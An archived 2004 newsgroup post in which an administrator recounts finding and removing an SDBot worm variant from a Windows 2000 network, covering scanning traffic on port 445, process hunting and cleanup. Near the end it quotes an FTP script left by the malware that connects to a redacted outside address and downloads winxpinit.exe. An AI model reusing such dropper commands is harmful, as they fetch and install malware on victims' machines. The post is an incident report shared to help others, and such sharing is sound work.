Re: Mysterious file - WINXPINIT.EXE

From: Jim Tompkins (tompkins_at_oct.net)
Date: 09/14/04

  • Next message: Wayne Brinegar [MSFT]: "RE: Strange internet traffic" 
    Date: 14 Sep 2004 09:11:33 -0700

    I found yout post while performing a search on "winxpinit.exe".
    Although I have not found this file on any machines on my network, I
    found (2) batch files on my (previosly infected) server that
    referenced winxpinit. I thought you might be interested in this
    information.
     
    Let me step back a littte.
     
    Last Friday our network got hit with a virus of some type that was
    preventing web page access to the internet. We could ping outside
    addresses, but could not browse the internet. After tearing down the
    network and isolating the machines I found out that I could access web
    pages when my laptop and the router were segregated from everything
    else. In otherwords I made an isolated network with my laptop and the
    router using a hub. When I plugged our W2K Server into this network
    web page access went down. I ran Ethereal and captured the packets
    before and after plugging the server into the isolated network. The
    server was sending out tcp packets to random adddresses in the
    192.168.x.x ranges. Each of these packets where destined for port 445.
    There were a ton of them. I am not a network guru, but I believe these
    packets were interfering with web access.
     
    After playing around I found out that these packets did not appear
    when the server was not logged on, so I used Remote Task Manager (RTM)
    to take a snap shot of the processes running before and after loggin.
    I found a process called svhost.exe NOT svchost.exe running. I viewed
    the netstat page in RTM and saw that their were alot of ports talking
    on the server. In short, killing this process stopped the suspiscious
    packets from being transmitted on the isolated network and I web page
    access came back again.
     
    I found this same process (system32\svhost.exe) and associated
    registry entries on all the machines in our network that authenticate
    with the W2K server (DC).
    I had someone helping me during all this, and he was insistant on
    putting the network back together and installing Symantec Anivirus
    coporate on the server and dispatch it to all the machines. We did
    this after I had cleaned the server and only a couple of the other
    machines. During this process the virus (svhost.exe) had propagated
    itself back onto the server and another machine. Symantec did not find
    any virus BTW.
     
    Before calling it quites (it was 1:30am). I cleaned the server again
    (killed the process, deleted the svhost file, and removed registry
    entries) and I unplugged everything from the network. I wanted to see
    if the server would become reinfected by itself. It did not.
     
    On Sunday I individually cleaned each machine and tested them on a hub
    with my laptop for the suspiscous packets. During this process I
    copied a few of the virus files to floppy. Once I got the network back
    up I used Mcafee enterprise and scanned the disk I had made. Mcafee
    reported that the file had the W32/sdbot.worm.gen.h virus.
     
    After all this I did a search on all the machines for files created
    around the timeframe the network 1st went haywire. On each machine I
    found (3) files; "o", "debug.txt", and "DCPROMO". Each of these files
    were created within a second apart. The "o" file appears to be a batch
    file, and the debug.txt file has log entries about exploiting various
    IP address and transfering svhost.exe.
     
    On the server I found two additional files of interest to you. The 1st
    had no name or extension and had the following commands:
     
    open xxx.xxx.xxx.xxx 12895 (I left out the external IP) it appears
    to be a dsl router, maybe another customer of our isp
    user a a
    binary
    GET winxpinit.exe
    bye
     
    The second file had some ftp commands and the following line:
    winxpinit.exe
     
    Let me know if you find anything out about this file.

  • Next message: Wayne Brinegar [MSFT]: "RE: Strange internet traffic"

    Relevant Pages

    • Re: Vista, SBS 2003 and RAS not working
      ... We have a windows SBS 2003 server – straight out of the box, ... The VPN connection between your computer and the VPN server could not ... You mention that the clients are Vista machines, which means that their built-in firewall works on outgoing messages as well as incoming ones, and the firewall needs to be told that outgoing PPTP VPN connections should be allowed. ... Computers don't need to be joined to the domain to connect by VPN, by the way, so you can use other remote computers for testing, it's just that only domain machines get access to all network resources easily. ...
      (microsoft.public.windows.server.sbs)
    • Re: Problem getting a new XP computer to join an NT 4.0/Win 98 domain
      ... > the computers and the file server with the goal of getting ... > If you scan Network Neighborhood for the Entire Network after ... > booting, there are 3 workgroups: ... > machines to see and map to shares on the NT file server. ...
      (microsoft.public.windowsxp.network_web)
    • Re: Problem getting a new XP computer to join an NT 4.0/Win 98 domain
      ... > the computers and the file server with the goal of getting ... > If you scan Network Neighborhood for the Entire Network after ... > booting, there are 3 workgroups: ... > machines to see and map to shares on the NT file server. ...
      (microsoft.public.win2000.networking)
    • Re: Connecting from Suse to windows workgroup on
      ... > pool of IPs) and I have just installed a Suse 9.3 Enterprise Server ... > From Suse pinging 127.0.0.1 works but no other machines on the Lan. ... problem with the network card or cabling... ...
      (alt.os.linux.suse)
    • RE: Misc Large ICMP Packets(snort)
      ... packets for communication between clients and daemons. ... Your server was being ping'ed as part of our ... Digital Island's intelligent network service offering. ... Sandpiper Networks merged with Digital Island in Dec 1999, ...
      (Focus-IDS)
    • Quantcast